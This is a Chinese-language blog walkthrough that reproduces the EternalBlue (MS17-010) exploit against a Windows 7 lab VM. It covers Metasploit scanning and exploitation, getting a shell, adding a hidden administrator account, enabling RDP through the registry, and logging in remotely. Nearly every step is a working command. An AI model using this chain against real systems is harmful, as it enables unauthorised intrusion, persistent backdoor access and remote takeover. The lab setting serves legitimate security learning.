前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用永恒之蓝(MS17010)漏洞攻击靶机

利用永恒之蓝(MS17010)漏洞攻击靶机

作者头像
777nx
发布2023-10-18 15:13:49
4540
发布2023-10-18 15:13:49
举报

参考:利用永恒之蓝(MS17010)漏洞攻击靶机

MS17010漏洞复现和利用

相关环境

攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版

获取靶机IP地址

打开cmd查看ip地址

代码语言:javascript
复制
ipconfig
image-20210203202706412.png
image-20210203202706412.png

关闭防火墙,检查通讯状态

需要关闭靶机的防火墙

打开网络和共享中心

image-20210203202834222.png
image-20210203202834222.png

进入windows防火墙设置

image-20210203202906298.png
image-20210203202906298.png
image-20210203202932655.png
image-20210203202932655.png
image-20210203203001386.png
image-20210203203001386.png

成功关闭防火墙

image-20210203203502759.png
image-20210203203502759.png
检查通讯状况

在kali linux里

代码语言:javascript
复制
ping 192.168.137.130
image-20210203203604876.png
image-20210203203604876.png

在windows 7里

代码语言:javascript
复制
ping 192.168.137.128
image-20210203203622717.png
image-20210203203622717.png

两边都ping得通,说明通讯正常

攻击步骤

检查是否存在漏洞

运行postgresql数据库

代码语言:javascript
复制
service postgresql start

打开msf

代码语言:javascript
复制
msfconsole
image-20210203203739927.png
image-20210203203739927.png

使用相关模块

代码语言:javascript
复制
use  auxiliary/scanner/smb/smb_ms17_010

查看相关配置信息

代码语言:javascript
复制
show options

设置目标IP为靶机的IP

代码语言:javascript
复制
set rhost 192.168.137.130

开始对靶机进行扫描

代码语言:javascript
复制
run 
image-20210203205501575.png
image-20210203205501575.png
发现漏洞并攻击

搜索msf17010漏洞模块

代码语言:javascript
复制
search ms17-010

使用该漏洞模块进行攻击

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue 

查看其配置详情

代码语言:javascript
复制
show options
image-20210203210021392.png
image-20210203210021392.png

设置靶机IP

代码语言:javascript
复制
set rhost 192.168.137.130

使用exploit或者run命令进行攻击

代码语言:javascript
复制
exploit
image-20210203210234736.png
image-20210203210234736.png

获取shell

代码语言:javascript
复制
shell
image-20210203210346744.png
image-20210203210346744.png
利用漏洞提权

创建管理员账户

代码语言:javascript
复制
net user pigpig 123456 /add

我们在win7那边已经可以看到了

image-20210203210657648.png
image-20210203210657648.png

增加管理员权限

代码语言:javascript
复制
net localgroup administrators pigpig /add
image-20210203210709099.png
image-20210203210709099.png

在去win7那边观察

image-20210203210749459.png
image-20210203210749459.png
开启3389端口并远程访问控制

将win7靶机那边远程服务打开

代码语言:javascript
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
image-20210203210855974.png
image-20210203210855974.png

打开3389端口之后,在新的shell里

代码语言:javascript
复制
rdesktop 192.168.137.130:3389
image-20210203212734846.png
image-20210203212734846.png

点击yes之后,就可以在kali里面进入到win7靶机了。

image-20210203212755623.png
image-20210203212755623.png
image-20210203212858622.png
image-20210203212858622.png

输入账户密码回车,点了同意靶机的管理员账户就会掉线

image-20210203212916039.png
image-20210203212916039.png

成功进入了

image-20210203213041501.png
image-20210203213041501.png
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-08-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • MS17010漏洞复现和利用
    • 相关环境
      • 获取靶机IP地址
        • 关闭防火墙,检查通讯状态
          • 需要关闭靶机的防火墙
          • 检查通讯状况
        • 攻击步骤
          • 检查是否存在漏洞
          • 发现漏洞并攻击
          • 利用漏洞提权
          • 开启3389端口并远程访问控制
      相关产品与服务
      数据库
      云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档